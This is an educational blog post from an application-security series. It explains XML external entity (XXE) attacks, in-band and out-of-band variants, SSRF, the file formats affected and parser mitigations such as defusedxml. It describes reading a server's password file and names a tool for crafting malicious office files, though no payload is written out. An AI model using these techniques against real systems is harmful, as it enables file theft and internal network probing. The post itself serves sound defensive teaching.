PDF, Excel, SVG, ebooks — all use XML. They can be vulnerable.

Image created by the author

XML is probably the most commonly used markup language. It’s organized around tags <example>foo</example> and allows pretty complicated structures

One interesting property about XML is that you can reference external entities, e.g. you can include another file. That is where the name XXE comes from: XML external entities. Let’s start!

Why you should care

  • XXE vulnerabilities can allow attackers to steal your data, scan your internal network, and even allow remote code execution (RCE)
  • XXE attacks were number 4 in the OWASP Top 10
  • The Twitter Tag #XXE is pretty active. So people are still interested in it, although the vulnerability was first recognized already in 2002 (source)
  • 2012: An XXE vulnerability was discovered in Inkscape (source)
  • 2014: Google was vulnerable to XXE and paid a bug bounty of $10,000 (source)
  • 2014: Adobe Reader had an XXE vulnerability (source)
  • 2015: Mohamed Ramadan discovered an XXE vulnerability in Facebooks resume upload (source)
  • 2020: IBM QRadar had an XXE vulnerability (source)

We don’t use XML!

Here are some indicators that you might need to care:

  • You’re using SOAP
  • You’re using SAML
  • You’re reading office files, such as Word (docx) or Excel files (xlsx; example, example). Powerpoint (pptx) contains XML as well. All of them are essentially ZIP archives with lots of XML files inside. I don’t think that Word / Excel / Powerpoint are vulnerable, but maybe the smaller libraries around those files that are used to programmatically create or read them.
  • You’re reading XMP meta data from images such as JPG or GIF (presentation, slides), meta data from audio and video files as well.
  • You’re reading PDF files
  • SVGs are XML as well.

The oxml_xxe tool makes it pretty easy to generate such a malicious file.

Types of XXEs

  • Inband: The output is shown to the attacker
  • Out of band (OOB): The attacker is blind

Inband XXE

Looks harmless, doesn’t it? It simply prints <root>Hello World!</root>

But if you change the xml string, then you can read the users passwords:

If this was part of a server, then the user could read arbitrary files on that server.

Out-of-Band XXE

Most of the time, the attacker cannot see the result of the parsed XML file directly. Hence inband XXE is not possible. And maybe errors are also captured, so an error-based XXE does also not work.

However, the attacker might be able to force the server to make HTTP calls. This is called server-side request forgery (SSRF). Then the attacker sets up a listener, forces the server to make a request, and thus confirms that XXE is possible. The Attack looks similar to the lines above and is pretty well explained here:

Mitigations

The simplest mitigation is to limit the capabilities of XML to a safe subset. Meaning that you need to limit the XML parser you’re using.

Python has 5 XML parsers: sax, etree, minidom, pulldom, xmlrpc. According to the documentation, they are safe to use. However, lxml is wide-spread. It mentions that you should configure the XML to not load external DTDs (source). The defusedxml package offers a way to access XML parsers with a secure default configuration.

See also

I would like to point you to this YouTube video by PwnFunction. It summarizes the topic very well.

If you’re interested in a summary over different XML parsers, try SoK: XML Parser Vulnerabilities (2016) by Christopher Späth, Christian Mainka, Vladislav Mladenov, Jörg Schwenk.

What’s next?

In this series about application security (AppSec) we already explained some of the techniques of the attackers 😈 and also techniques of the defenders 😇:

And this is about to come:

  • CSRF 😈
  • DOS 😈
  • Credential Stuffing 😈
  • Cryptojacking 😈
  • Single-Sign-On 😇
  • Two-Factor Authentication 😇
  • Backups 😇
  • Disk Encryption 😇

Let me know if you are interested in more articles around AppSec / InfoSec!

👋 Join FAUN today and receive similar stories each week in your inbox! Get your weekly dose of the must-read tech stories, news, and tutorials.

Follow us on Twitter 🐦 and Facebook 👥 and Instagram 📷 and join our Facebook and Linkedin Groups 💬

If this post was helpful, please click the clap 👏 button below a few times to show your support for the author! ⬇


XXE attacks 😈 was originally published in FAUN on Medium, where people are continuing the conversation by highlighting and responding to this story.